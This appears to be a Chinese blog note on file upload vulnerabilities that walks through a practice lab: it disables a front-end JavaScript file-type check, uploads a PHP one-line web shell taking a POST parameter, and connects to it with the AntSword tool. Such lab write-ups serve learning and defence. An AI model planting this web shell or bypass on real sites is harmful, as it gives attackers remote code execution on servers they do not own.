当前位置: 首页 > news >正文

文件上传的小点总结

1.文件上传漏洞

服务器端脚本语言对上传文件没有严格的验证和过滤,就可以给攻击者上传恶意脚本文件的可能。

文件上传检测绕过:

简单思路:(这里以前端上传图片为例)

①开启phpstudy,启动apache即可,将目录设为靶场网站下www的目录。

②获取靶场源码,可以先保存到本地。

③使用notepad++修改文件上传过滤的JS文件,使其条件判断允许非正常文件后缀通过,并且在form表单中加入action属性,处理前端页面。

下面就是一个文件类型判断的代码,将判断条件可以直接改为1==-1就可以让文件允许上传。

//判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;alert(errMsg);
        return false;
    }

重新打开本地保存好的靶场首页文件,选择任意php文件上传后,复制图片地址进行访问。(使用了一个info.php文件)

如果要上传一句话木马,那么直接写文件

<?php @_eval($_POST['hack']); ?>

将文件名改为111.php,直接上传文件,上传成功后,复制图片地址。使用蚁剑,将刚才的地址和连接密码(也就是POST参数)连接并添加。

上传成功,刚才的两个文件这里都可以看到。

相关文章:

  • JVM如何处理Java中的精度转换: 从源码到字节码
  • 查看自己的公有ip
  • 深度解析 | Android 13 Launcher3分页指示器改造:横线变圆点实战指南
  • 玄机-第四章 windows实战-emlog的测试报告
  • 初识Brainstorm(matlab)
  • JSON在AutoCAD二次开发中应用场景及具体案例
  • PHP 应用后台模块SessionCookieToken身份验证唯一性
  • 2025.3.17-2025.3.23学习周报
  • (UI自动化测试web端)第二篇:元素定位的方法_name定位
  • DeepSeek和Kimi在Neo4j中的表现
  • 教育装备展爆款产品:全息展示台+VR教育设备组合应用方案
  • 【自学笔记】智能合约基础知识点总览-持续更新
  • 如何使用命令行启动postgres数据库
  • 汇编语言习题笔记——第1章 汇编语言基础
  • 使用Doris broker load导入数据到带Kerberos的HA HDFS的命令详解
  • dns解析速度很快网页打开不了?
  • 5G通信协议相关
  • Leetcode 3494. Find the Minimum Amount of Time to Brew Potions
  • 网络编程--服务器双客户端聊天
  • 论文阅读:2023 arxiv Multiscale Positive-Unlabeled Detection of AI-Generated Texts
  • 国家主席习近平同普京总统出席签字和合作文本交换仪式
  • 中消协点名新能源汽车行业:定金退款争议频发
  • 44岁街舞运动推广者、浙江省街舞运动协会常务理事钟永玮离世
  • 李云泽:再批复600亿元,进一步扩大保险资金长期投资试点范围
  • 【社论】跑赢12级狂风,敦煌做对了什么
  • 《中国医药指南》就涉宫颈癌等论文出现男性病例致歉:辞退涉事编辑